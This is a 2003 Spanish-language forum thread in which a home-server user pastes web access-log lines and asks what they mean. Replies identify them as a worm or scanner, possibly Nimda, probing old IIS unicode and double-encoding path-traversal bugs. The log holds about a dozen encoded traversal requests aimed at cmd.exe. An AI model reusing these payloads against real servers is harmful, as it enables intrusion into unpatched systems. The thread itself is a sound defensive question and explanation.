BandaAncha

  • 🔍 en 📰 artículos ⏎
  • 🔍 en 💬 foros ⏎
  • 🔍 en 👇 este 💬 foro ⏎
  • 🔍 en 👇 este 💬 tema ⏎
Regístrate Regístrate Identifícate Identifícate

Alguien me puede decir que significa esto??

1
Erco

Estoy utilizando mi ordenador como servidor y en el log de accesos aparecen estas lineas, alguien me puede indicar que significa?
213.37.68.150 - [14/May/2003:20:02:07 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:07 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:07 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:08 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:08 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:08 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:08 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:08 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:09 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
213.37.68.150 - [14/May/2003:20:02:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
Gracias y saludos
Erco

Este tema está cerrado a nuevas respuestas. Abre un nuevo tema para retomar la conversación.
MainFrame

... un log de intento de infección de un gusano que vi hace poco ( el informe es de hace mucho: 2001). He buscado la página, el gusano se llamaba Nimda, y aunque el log no sea igual, puede que se trate de otro. Pero yo no sé lo suficiente para afirmarlo. Te dejo el enlace:

biocora.com/linux/article.php?sid=198

Suerte y salu2.

hypnosys

buenas a la peña, volvi... ;)

heh... Si si, probablemente sea un scan de un worm, o un script-kiddie... (a veces no diferencio, son de la misma especie, jejej :-P)
Por lo visto escaneaban vulnerabilidades de unicode/decode, bugs viejos de IIS. Mientras tengas el apache, no tenes porqué preocuparte de "esos" logs.

hypno